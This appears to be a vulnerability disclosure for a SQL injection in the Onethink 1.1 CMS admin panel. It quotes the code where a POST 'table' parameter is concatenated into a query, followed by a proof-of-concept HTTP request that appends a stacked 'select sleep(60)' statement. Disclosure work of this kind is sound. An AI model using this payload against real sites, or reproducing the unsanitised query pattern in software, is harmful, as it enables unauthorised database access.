A SQL injection vulnerability in Onethink 1.1
In https://github.com/liu21st/onethink/blob/f705308bc24611af650e6830e3be2a07dd8bb823/wwwroot/Application/Admin/Controller/ModelController.class.php#L148,
$table
is controlled by users.
$table = I('post.table');
empty($table) && $this->error('请选择要生成的数据表!');
$res = D('Model')->generate($table,I('post.name'),I('post.title'));
In https://github.com/liu21st/onethink/blob/f705308bc24611af650e6830e3be2a07dd8bb823/wwwroot/Application/Admin/Model/ModelModel.class.php#L122,
$table
is inserted into SQL directly.
public function generate($table,$name='',$title=''){
// ......
$fields = M()->query('SHOW FULL COLUMNS FROM '.$table);
//......
}
POC:
POST /admin.php?s=/Model/generate.html HTTP/1.1
Host: www.myonethink.com
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 67
Origin: http://www.myonethink.com
DNT: 1
Sec-GPC: 1
Connection: close
Referer: http://www.myonethink.com/admin.php?s=/Model/generate.html
Cookie: PHPSESSID=l7mt7mtb5sr16frdpv6fqibith; onethink_admin___forward__=%2Fadmin.php%3Fs%3D%2FModel%2Findex.html
table=onethink_action;select%20sleep(60)&name=test2&title=test2&id=